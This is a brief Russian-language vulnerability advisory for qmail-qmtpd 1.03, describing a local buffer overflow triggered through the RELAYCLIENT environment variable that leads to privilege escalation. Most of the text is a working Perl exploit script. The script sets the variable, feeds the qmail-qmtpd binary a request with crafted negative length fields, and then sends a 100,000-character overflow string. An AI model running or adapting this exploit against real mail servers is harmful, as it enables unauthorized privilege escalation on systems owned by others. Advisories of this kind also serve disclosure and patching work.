Программа: Qmail-qmtpd 1.03
Переполнение буфера обнаружено в qmail-qmtpd. Локальный пользователь может получить поднятые привилегии.
Локальный пользователь может установить RELAYCLIENT переменную окружения к специально сформированному значению, чтобы вызвать переполнение буфера.
Эксплоит:
#!/usr/bin/perl -w
#Copyright Georgi Guninski\nCannot be used in vulnerability databases and
#similar stuff
use IO::Socket;
use IO::Poll;
$ENV{"RELAYCLIENT"}="M\$UX";
open(SOCK,"|/var/qmail/bin/qmail-qmtpd");
my $req;
my $fromaddr="they\@m\$.weenies";
my $touser="postmaster";
print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be
used in vulnerability d
atabases and similar stuff\n";
$req = "1:\n,";
$req .= "1:V,";
$req .= "/:"; #biglen - this is how we code '-1'
$req .= ",:"; #len - this is how we code '-4'
print SOCK $req;
my $ch=getc();
$req = "v" x 100000;
print SOCK $req;
close SOCK;
